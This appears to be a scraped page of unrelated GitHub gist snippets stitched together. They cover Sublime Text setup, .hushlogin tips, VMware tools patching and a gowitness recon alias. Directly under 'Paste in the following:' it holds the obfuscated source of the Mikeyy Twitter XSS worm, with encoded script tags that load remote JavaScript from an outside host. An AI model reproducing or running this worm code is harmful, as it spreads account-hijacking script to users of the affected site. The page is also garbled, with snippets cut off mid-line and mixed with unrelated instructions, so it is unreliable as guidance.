Install Package Control for easy package management.
- Open the console with
Ctrl+` - Paste in the following:
| function XHConn() | |
| { | |
| var xmlhttp, bComplete = false; | |
| try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } | |
| catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } | |
| catch (e) { try { xmlhttp = new XMLHttpRequest(); } | |
| catch (e) { xmlhttp = false; }}} | |
| if (!xmlhttp) return null; | |
| this.connect = function(sURL, sMethod, sVars, fnDone) | |
| { |
| var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72 |
| Remove: | |
| touch .hushlogin | |
| Get it back: | |
| rm .hushlogin |
Install Package Control for easy package management.
Ctrl+`
git clone https://github.com/rasa/vmware-tools-patches.git
cd vmware-tools-patches
curl -O https://softwareupdate.vmware.com/cds/vmw-desktop/fusion/6.0.5/2209127/packages/com.vmware.fusion.tools.linux.zip.tar
for i in {0..6}; do sudo mkdir -pv /etc/init.d/rc${i}.d; done
sudo pacman -S net-utils
./untar-and-patch-and-compile.sh
A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
| alias reconme='function frecon() | |
| { | |
| mkdir $1 | |
| $HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$ | |
| $HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$ | |
| mv report.html $1/report-$1.html | |
| sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html | |
| chown -R www-data:www-data /var/www/html/recon | |
| touch /var/www/html/recon/$1/index.html |